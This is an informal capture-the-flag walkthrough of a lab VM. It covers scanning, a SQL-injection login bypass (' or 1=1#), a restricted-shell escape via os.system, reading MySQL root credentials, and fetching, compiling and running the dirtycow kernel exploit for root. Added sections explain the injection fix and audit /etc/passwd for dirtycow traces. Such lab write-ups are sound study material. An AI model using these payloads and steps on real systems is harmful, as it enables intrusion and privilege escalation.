Let's start with the machine.
First download the machine from the URL and set it up in VirtualBox. Attach it to the host-only network (vboxnet0) so that it picks up a dynamic IP on its own, then enumerate it.
To find its IP, use
netdiscover -i vboxnet0
MACHINE IP — 192.168.56.103
Let's start with nmap.

After the nmap scan,
visiting the HTTP service we find a member login page.

After trying default creds we didn't get in,
so let's use gobuster to search for available directories:
gobuster -w location-of-wordlist -u url

Let's visit these directories.
After visiting them we find .php files, but they aren't useful because they redirect us back to the login page, http://192.168.56.103/index.php.
So what now? From the gobuster result we know there are two users, john and robert, so what if we log in to index.php with those usernames....
Using the username robert and a MySQL injection string as the password bypasses the login page:
username — robert
password — ' or 1=1#
BINGOOOO!!!!!!! we got the password for robert
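Why `' or 1=1#` works, and what the fix looks like, as an added example (not code from the original write-up or from the VM): the login query is built by string concatenation, so the quote closes the password literal, `or 1=1` makes the WHERE clause always true, and `#` comments out the rest. The table, rows and passwords below are constructed sample data; SQLite stands in for MySQL, with a small helper that emulates MySQL's `#` comment so the page's exact payload can be shown.

```python
import sqlite3

# Constructed in-memory stand-in for the members table behind index.php.
# The schema, rows and passwords are sample data, not the VM's real ones;
# passwords are stored in plaintext only to mirror the walkthrough.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?)",
                     [("robert", "s3cret-sample"), ("john", "another-sample")])
    return conn

def strip_mysql_comment(sql):
    """Emulate MySQL treating '#' outside a quoted string as a comment.
    SQLite has no '#' comments, so without this the page's payload would
    be a syntax error here instead of a bypass."""
    in_quote = False
    for i, ch in enumerate(sql):
        if ch == "'":
            in_quote = not in_quote
        elif ch == "#" and not in_quote:
            return sql[:i]
    return sql

def login_vulnerable(conn, username, password):
    """Login check built by string concatenation (the bug the page exploits)."""
    sql = ("SELECT username FROM members WHERE username = '%s' "
           "AND password = '%s'" % (username, password))
    row = conn.execute(strip_mysql_comment(sql)).fetchone()
    return row[0] if row else None

def login_safe(conn, username, password):
    """Same check with bound parameters: the payload is compared as data."""
    row = conn.execute(
        "SELECT username FROM members WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    payload = "' or 1=1#"  # the password the page submits for robert
    print("vulnerable login returns:", login_vulnerable(make_db(), "robert", payload))
    print("parameterized login returns:", login_safe(make_db(), "robert", payload))
```

With the payload, the concatenated query becomes `... AND password = '' or 1=1` and matches every row, so the first user comes back; the parameterized version compares the payload as a literal string and returns nothing.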

In the nmap scan we observed that the SSH port was open, so let's try to get in using these credentials.

But again we see that we don't have a proper interactive shell:

After entering "?" we see that we have permission to use echo, so let's see how to get an interactive shell using the echo command.

So we get our interactive shell using
echo os.system("/bin/bash")
Now we search for some credentials: the MySQL port was open, so what if we get credentials to move in with? After searching for config files I moved to the /var/html directory; there we found the john directory, and john.php holds the root login information for the MySQL service.

Here we see that MySQL can be logged into as root without any authentication, so let's check what it holds, using
mysql -u root -p
We get the member database, and there we find the users' account info with their passwords.

Now that we have the john user's info, let's switch to john using its password, and now we are the john user:
username — john
password — MyNameIsJohn

Again, to get a proper interactive shell we use
echo os.system("/bin/bash")
After logging in,
let's see whether the kernel is vulnerable or not using
uname -a
Here we see that the system kernel is vulnerable to dirtycow (follow the dirtycow link to get the dirtycow script).
So let's share our dirtycow.c with the target PC using a Python web server:
python -m SimpleHTTPServer 80
NOTE :- run the above command on your local host, starting the server in the directory that holds the dirtycow.c file.
Then fetch the file on the target PC using
wget http://192.168.56.1/dirtycow.c
and compile dirtycow.c using
gcc -pthread dirtycow.c -o dirtycow -lcrypt
and now run it:
./dirtycow
Before moving ahead, let's see what dirtycow does:
it automatically generates a new passwd line, and the user is prompted for the new password when the binary is run.
The original /etc/passwd file is then backed up to /tmp/passwd.bak
and the root account is overwritten with the generated line.
After running the exploit you should be able to log in with the newly created user.
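From the defender's side, the behaviour just described leaves recognisable traces: a uid-0 entry whose name is no longer root, a password hash sitting inline in /etc/passwd instead of /etc/shadow, a file that no longer matches its recorded baseline, and the backup at /tmp/passwd.bak. The following Python script is added here as an illustration (not part of the original write-up or of the exploit) and audits a passwd file for those traces; the sample file contents, the account name, and the exact shape of the generated root line are constructed assumptions.

```python
import hashlib

# Constructed sample /etc/passwd contents (not copied from the VM).
CLEAN_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "john:x:1000:1000:john,,,:/home/john:/bin/bash\n"
)

# The same file after the root line has been overwritten. The page says the
# exploit generates a new passwd line for the root account and backs the
# original up to /tmp/passwd.bak; the exact shape of that line (a crypt-style
# hash placed inline instead of 'x') is an assumption here, and the account
# name, salt and hash below are constructed placeholders.
TAMPERED_PASSWD = (
    "newroot:$6$constructedsalt$constructedhash:0:0:pwned:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "john:x:1000:1000:john,,,:/home/john:/bin/bash\n"
)

# Password fields that mean "hash is in /etc/shadow" or "login locked".
BENIGN_PW_FIELDS = {"x", "*", "!", "!!"}

def parse_passwd(text):
    """Return the 7-field entries of a passwd file, skipping blank and malformed lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) == 7:
            entries.append(fields)
    return entries

def digest(text):
    """SHA-256 of the file contents, used for the baseline comparison."""
    return hashlib.sha256(text.encode()).hexdigest()

def audit_passwd(text, baseline=None, tmp_listing=()):
    """Return findings that point at a dirtycow-style rewrite of /etc/passwd.

    text        current /etc/passwd contents
    baseline    known-good contents recorded earlier (optional)
    tmp_listing paths seen in /tmp (optional), to spot the backup the exploit leaves
    """
    findings = []
    uid0 = [e for e in parse_passwd(text) if e[2] == "0"]
    for name, pw, *_ in uid0:
        if name != "root":
            findings.append(f"uid 0 account {name!r} (expected only root)")
        if pw == "":
            findings.append(f"uid 0 account {name!r} has an empty password field")
        elif pw not in BENIGN_PW_FIELDS:
            findings.append(f"uid 0 account {name!r} carries a password hash inline in /etc/passwd")
    if not any(e[0] == "root" for e in uid0):
        findings.append("no uid 0 entry named 'root' (root line replaced?)")
    if baseline is not None and digest(text) != digest(baseline):
        findings.append("/etc/passwd differs from the recorded baseline")
    if "/tmp/passwd.bak" in tmp_listing:
        findings.append("/tmp/passwd.bak present: the backup the exploit writes before overwriting root")
    return findings

if __name__ == "__main__":
    for finding in audit_passwd(TAMPERED_PASSWD, baseline=CLEAN_PASSWD,
                                tmp_listing=["/tmp/passwd.bak"]):
        print("FINDING:", finding)
```

On a real host you would read /etc/passwd and a directory listing of /tmp into `text` and `tmp_listing`, and keep the baseline somewhere the box cannot reach, since an attacker with a root shell can rewrite a local baseline just as easily as the passwd file.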
and see what we got

Hence we got a root shell.
thank you :)